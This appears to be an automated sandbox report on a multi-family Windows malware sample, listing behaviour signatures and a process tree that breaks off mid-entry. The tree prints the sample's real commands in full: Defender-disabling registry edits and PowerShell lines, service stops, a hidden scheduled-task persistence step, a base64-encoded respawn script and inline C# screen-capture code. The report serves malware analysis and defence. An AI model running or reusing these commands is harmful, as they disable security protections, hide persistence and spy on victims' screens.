Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    24/08/2026, 23:34

General

  • Target
    2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
  • Size 53.4MB
  • Sample260824-3khnmazzdv
  • SHA256 88a32a02a5fd8db6fc58c8549944f8cb9e04d02b936057dac958263e5cfdde71
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables one or more Microsoft Defender components 1 TTPs 2 IoCs

    Uses the Powershell Set-MpPreference cmdlet to disable one or more Microsoft Defender components.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 3 IoCs
  • Prevents Microsoft Defender from scanning certain paths by adding an exclusion. 2 TTPs 6 IoCs

    Uses the Powershell Add-MpPreference cmdlet to exclude paths from being scanned by Microsoft Defender.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Stops running service(s) 4 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 8 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Indicator Removal: Clear Persistence 1 TTPs 4 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Looks up external IP address via web service 1 TTPs 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Discovers running processes 1 TTPs 2 IoCs

    Running process information can be used to identify security tools or plan follow-on actions.

  • Executes a VBScript file via the Windows Script Host. 1 TTPs 2 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 8 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 8 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Executes a command shell one-liner 1 TTPs 62 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks processor information in registry 2 TTPs 48 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 8 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4428
    • C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
      C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe C:\snapshot\lofy\_monkey_b8dd4dbe.js
      2⤵
      • Checks processor information in registry
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name W -Namespace N -MemberDefinition "[DllImport(\"kernel32.dll\")]public static extern IntPtr GetConsoleWindow();[DllImport(\"kernel32.dll\")]public static extern bool FreeConsole();[DllImport(\"kernel32.dll\")]public static extern bool AttachConsole(uint p);[DllImport(\"user32.dll\")]public static extern bool ShowWindow(IntPtr h,int s);";[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0);[N.W]::FreeConsole();""
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name W -Namespace N -MemberDefinition "[DllImport(\"kernel32.dll\")]public static extern IntPtr GetConsoleWindow();[DllImport(\"kernel32.dll\")]public static extern bool FreeConsole();[DllImport(\"kernel32.dll\")]public static extern bool AttachConsole(uint p);[DllImport(\"user32.dll\")]public static extern bool ShowWindow(IntPtr h,int s);";[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0);[N.W]::FreeConsole();"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1616
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "net session"
        3⤵
        • Executes a command shell one-liner
        • Suspicious use of WriteProcessMemory
        PID:4164
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4820
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:3004
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\ProgramData\Microsoft\Windows\ServiceProfiles\f190f7e9ca03""
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:1008
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\ProgramData\Microsoft\Windows\ServiceProfiles\f190f7e9ca03"
            4⤵
            • Views/modifies file attributes
            PID:4656
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\f190f7e9ca03""
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\f190f7e9ca03"
            4⤵
            • Views/modifies file attributes
            PID:2316
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\ProgramData\._wdm""
          3⤵
          • Hide Artifacts: Hidden Files and Directories
          • Suspicious use of WriteProcessMemory
          PID:1596
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\ProgramData\._wdm"
            4⤵
            • Views/modifies file attributes
            PID:4956
        • C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
          C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe -e "eval(Buffer.from(\"CmNvbnN0IGNwPXJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKSxmcz1yZXF1aXJlKCdmcycpOwpjb25zdCBwaWQ9MTI4MDsKY29uc3QgaXNDb21waWxlZD10cnVlOwpjb25zdCBvcmlnRXhlPSJDOlxcVXNlcnNcXEFkbWluXFxBcHBEYXRhXFxMb2NhbFxcVGVtcFxcMjAyNi0wOC0yNF9kNzJjYWM2MThjZGM1MjIyZjU1ZTVmNjUxNTM0MGRkOV9ibGFua2dyYWJiZXJfY29pbm1pbmVyX2dsYXNzd29ybV9pY2VkaWRfbHVjYS1zdGVhbGVyX25qcmF0X3N0ZWFsY196eHh6LmV4ZSI7CmNvbnN0IG9yaWdTY3JpcHQ9IkM6XFxzbmFwc2hvdFxcbG9meVxcX21vbmtleV9iOGRkNGRiZS5qcyI7CmNvbnN0IG9yaWdOTT0iQzpcXHNuYXBzaG90XFxsb2Z5XFxub2RlX21vZHVsZXMiOwpjb25zdCBia0V4ZT0iQzpcXFByb2dyYW1EYXRhXFxNaWNyb3NvZnRcXFdpbmRvd3NcXFNlcnZpY2VQcm9maWxlc1xcZjE5MGY3ZTljYTAzXFwyMDI2LTA4LTI0X2Q3MmNhYzYxOGNkYzUyMjJmNTVlNWY2NTE1MzQwZGQ5X2JsYW5rZ3JhYmJlcl9jb2lubWluZXJfZ2xhc3N3b3JtX2ljZWRpZF9sdWNhLXN0ZWFsZXJfbmpyYXRfc3RlYWxjX3p4eHouZXhlIjsKY29uc3QgYmtTY3JpcHQ9IiI7CmNvbnN0IGJrTk09IiI7CnNldEludGVydmFsKCgpPT57CiAgbGV0IGFsaXZlPWZhbHNlOwogIHRyeXtwcm9jZXNzLmtpbGwocGlkLDApO2FsaXZlPXRydWU7fWNhdGNoKGUpe30KICBpZighYWxpdmUpewogICAgY29uc3QgZW52PU9iamVjdC5hc3NpZ24oe30scHJvY2Vzcy5lbnYse19OWVhfSElEREVOOicxJ30pOwogICAgaWYoaXNDb21waWxlZCl7CiAgICAgIGxldCBydW5FeGU9b3JpZ0V4ZTsKICAgICAgaWYoIWZzLmV4aXN0c1N5bmMob3JpZ0V4ZSkpewogICAgICAgIGlmKGJrRXhlJiZmcy5leGlzdHNTeW5jKGJrRXhlKSlydW5FeGU9YmtFeGU7CiAgICAgICAgZWxzZSBwcm9jZXNzLmV4aXQoKTsKICAgICAgfQogICAgICBjcC5zcGF3bihydW5FeGUsW10se2RldGFjaGVkOnRydWUsc3RkaW86J2lnbm9yZScsd2luZG93c0hpZGU6dHJ1ZSxlbnZ9KS51bnJlZigpOwogICAgfWVsc2V7CiAgICAgIGxldCBydW5TY3JpcHQ9b3JpZ1NjcmlwdCxucD1vcmlnTk07CiAgICAgIGlmKCFmcy5leGlzdHNTeW5jKG9yaWdTY3JpcHQpKXsKICAgICAgICBpZihmcy5leGlzdHNTeW5jKGJrU2NyaXB0KSl7cnVuU2NyaXB0PWJrU2NyaXB0O25wPWJrTk07fQogICAgICAgIGVsc2UgcHJvY2Vzcy5leGl0KCk7CiAgICAgIH0KICAgICAgaWYobnApZW52Lk5PREVfUEFUSD1ucDsKICAgICAgY3Auc3Bhd24ocHJvY2Vzcy5leGVjUGF0aCxbcnVuU2NyaXB0XSx7ZGV0YWNoZWQ6dHJ1ZSxzdGRpbzonaWdub3JlJyx3aW5kb3dzSGlkZTp0cnVlLGVudn0pLnVucmVmKCk7CiAgICB9CiAgICBwcm9jZXNzLmV4aXQoKTsKICB9Cn0sMzAwMCk7\",\"base64\").toString())"
          3⤵
            PID:4604
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.vbs""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.vbs"
              4⤵
              • Views/modifies file attributes
              PID:4264
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "net session"
            3⤵
            • Executes a command shell one-liner
            • Suspicious use of WriteProcessMemory
            PID:4260
            • C:\Windows\system32\net.exe
              net session
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4152
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 session
                5⤵
                  PID:2152
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "schtasks /Delete /TN "WindowsSystemUpdateSvc" /F"
              3⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:1204
              • C:\Windows\system32\schtasks.exe
                schtasks /Delete /TN "WindowsSystemUpdateSvc" /F
                4⤵
                  PID:2992
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "schtasks /Delete /TN "ScreenLiveClient" /F"
                3⤵
                • Indicator Removal: Clear Persistence
                • Suspicious use of WriteProcessMemory
                PID:292
                • C:\Windows\system32\schtasks.exe
                  schtasks /Delete /TN "ScreenLiveClient" /F
                  4⤵
                    PID:3252
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "schtasks /Create /TN "ScreenLiveClient" /TR "wscript.exe \"C:\Users\Admin\AppData\Local\Temp\svchost.vbs\"" /SC ONLOGON /RL HIGHEST /F"
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:2816
                  • C:\Windows\system32\schtasks.exe
                    schtasks /Create /TN "ScreenLiveClient" /TR "wscript.exe \"C:\Users\Admin\AppData\Local\Temp\svchost.vbs\"" /SC ONLOGON /RL HIGHEST /F
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4732
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "net session"
                  3⤵
                  • Executes a command shell one-liner
                  • Suspicious use of WriteProcessMemory
                  PID:5944
                  • C:\Windows\system32\net.exe
                    net session
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3968
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 session
                      5⤵
                        PID:5728
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "net session"
                    3⤵
                    • Executes a command shell one-liner
                    • Suspicious use of WriteProcessMemory
                    PID:4472
                    • C:\Windows\system32\net.exe
                      net session
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1592
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 session
                        5⤵
                          PID:5416
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe -NoProfile -NoLogo -ExecutionPolicy Bypass -Command " Add-Type -AssemblyName System.Drawing Add-Type -AssemblyName System.Windows.Forms $dR = [System.Drawing.Bitmap].Assembly.Location $wR = [System.Windows.Forms.Screen].Assembly.Location Add-Type -ReferencedAssemblies $dR,$wR -TypeDefinition @\" using System; using System.Drawing; using System.Drawing.Imaging; using System.IO; using System.Threading; using System.Windows.Forms; public class SS { static int cm = 0; static bool go = true; public static void Run(int mw, int q, int fps) { try { System.Diagnostics.Process.GetCurrentProcess().PriorityClass = System.Diagnostics.ProcessPriorityClass.BelowNormal; } catch {} var sc = Screen.AllScreens; for (int i = 0; i < sc.Length; i++) { var s = sc[i]; Console.Error.WriteLine(\"MON:\" + i + \"|\" + s.Bounds.Width + \"x\" + s.Bounds.Height + \"|\" + (s.Primary ? \"P\" : \"S\")); } Console.Error.WriteLine(\"READY\"); var th = new Thread(() => { try { var si = Console.OpenStandardInput(); while (go) { int b = si.ReadByte(); if (b == -1) { go = false; break; } if (b >= 0 && b < Screen.AllScreens.Length) cm = b; } } catch {} }); th.IsBackground = true; th.Start(); ImageCodecInfo jc = null; foreach (var c in ImageCodecInfo.GetImageEncoders()) if (c.MimeType == \"image/jpeg\") { jc = c; break; } var ep = new EncoderParameters(1); ep.Param[0] = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)q); int d = 1000 / fps; Stream so = Console.OpenStandardOutput(); Bitmap cb = null; Graphics cg = null; Bitmap ob = null; Graphics og = null; int lm = -1; try { while (go) { long t = Environment.TickCount; int m = cm; var ss = Screen.AllScreens; if (m >= ss.Length) m = 0; var bn = ss[m].Bounds; if (m != lm || cb == null) { if (cg != null) cg.Dispose(); if (cb != null) cb.Dispose(); if (og != null) og.Dispose(); if (ob != null) ob.Dispose(); cb = new Bitmap(bn.Width, bn.Height, PixelFormat.Format32bppRgb); cg = Graphics.FromImage(cb); float ra = Math.Min(1.0f, (float)mw / bn.Width); if (ra < 1.0f) { int ow = (int)(bn.Width * ra), oh = (int)(bn.Height * ra); ob = new Bitmap(ow, oh, PixelFormat.Format32bppRgb); og = Graphics.FromImage(ob); og.InterpolationMode = System.Drawing.Drawing2D.InterpolationMode.Bilinear; og.CompositingQuality = System.Drawing.Drawing2D.CompositingQuality.HighSpeed; } else { ob = null; og = null; } lm = m; } cg.CopyFromScreen(bn.X, bn.Y, 0, 0, new Size(bn.Width, bn.Height), CopyPixelOperation.SourceCopy); Bitmap tgt; if (ob != null && og != null) { og.DrawImage(cb, 0, 0, ob.Width, ob.Height); tgt = ob; } else tgt = cb; using (var ms = new MemoryStream()) { if (jc != null) tgt.Save(ms, jc, ep); else tgt.Save(ms, ImageFormat.Jpeg); byte[] jpg = ms.ToArray(); byte[] ln = BitConverter.GetBytes(jpg.Length); so.Write(ln, 0, 4); so.Write(jpg, 0, jpg.Length); so.Flush(); } long el = Environment.TickCount - t; int w = (int)(d - el); if (w > 0) Thread.Sleep(w); } } finally { if (cg != null) cg.Dispose(); if (cb != null) cb.Dispose(); if (og != null) og.Dispose(); if (ob != null) ob.Dispose(); } } } \"@ [SS]::Run(960, 40, 12) "
                      3⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:596
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ioo5j3hh\ioo5j3hh.cmdline"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3456
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1DFE.tmp" "c:\Users\Admin\AppData\Local\Temp\ioo5j3hh\CSCEB4168607D78488C9558F9D470D8A2C2.TMP"
                          5⤵
                            PID:2424
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo //B "C:\Users\Admin\AppData\Local\Temp\system_check_1787614485866.vbs""
                        3⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:4216
                        • C:\Windows\system32\cscript.exe
                          cscript //nologo //B "C:\Users\Admin\AppData\Local\Temp\system_check_1787614485866.vbs"
                          4⤵
                          • Executes a VBScript file via the Windows Script Host.
                          PID:3760
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 4 /f"
                        3⤵
                        • Executes a command shell one-liner
                        • Suspicious use of WriteProcessMemory
                        PID:1172
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 4 /f
                          4⤵
                            PID:4628
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f"
                          3⤵
                          • Executes a command shell one-liner
                          • Suspicious use of WriteProcessMemory
                          PID:2736
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                            4⤵
                              PID:4988
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:436
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              4⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              PID:4584
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:4728
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
                              4⤵
                                PID:2300
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:1952
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:800
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:1324
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:5280
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:1328
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1152
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:2876
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:1248
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f"
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:2712
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                                4⤵
                                  PID:1264
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
                                3⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:1380
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
                                  4⤵
                                    PID:2272
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue; Set-MpPreference -MAPSReporting Disabled -ErrorAction SilentlyContinue; Set-MpPreference -SubmitSamplesConsent NeverSend -ErrorAction SilentlyContinue; Set-MpPreference -PUAProtection Disabled -ErrorAction SilentlyContinue""
                                  3⤵
                                  • Disables one or more Microsoft Defender components
                                  • Hide Artifacts: Hidden Window
                                  • Hide Artifacts: Ignore Process Interrupts
                                  • Suspicious use of WriteProcessMemory
                                  PID:2656
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning $true -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction SilentlyContinue; Set-MpPreference -MAPSReporting Disabled -ErrorAction SilentlyContinue; Set-MpPreference -SubmitSamplesConsent NeverSend -ErrorAction SilentlyContinue; Set-MpPreference -PUAProtection Disabled -ErrorAction SilentlyContinue"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5584
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "sc stop WinDefend"
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:1288
                                  • C:\Windows\system32\sc.exe
                                    sc stop WinDefend
                                    4⤵
                                    • Launches sc.exe
                                    PID:5008
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "sc config WinDefend start= disabled"
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:2524
                                  • C:\Windows\system32\sc.exe
                                    sc config WinDefend start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    PID:1672
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "sc stop SecurityHealthService"
                                  3⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4468
                                  • C:\Windows\system32\sc.exe
                                    sc stop SecurityHealthService
                                    4⤵
                                    • Launches sc.exe
                                    PID:4876
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "sc config SecurityHealthService start= disabled"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:3004
                                  • C:\Windows\system32\sc.exe
                                    sc config SecurityHealthService start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    PID:5832
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe' -ErrorAction SilentlyContinue""
                                  3⤵
                                  • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                  • Hide Artifacts: Hidden Window
                                  • Hide Artifacts: Ignore Process Interrupts
                                  PID:2848
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe' -ErrorAction SilentlyContinue"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2708
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:TEMP' -ErrorAction SilentlyContinue""
                                  3⤵
                                  • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                  • Hide Artifacts: Hidden Window
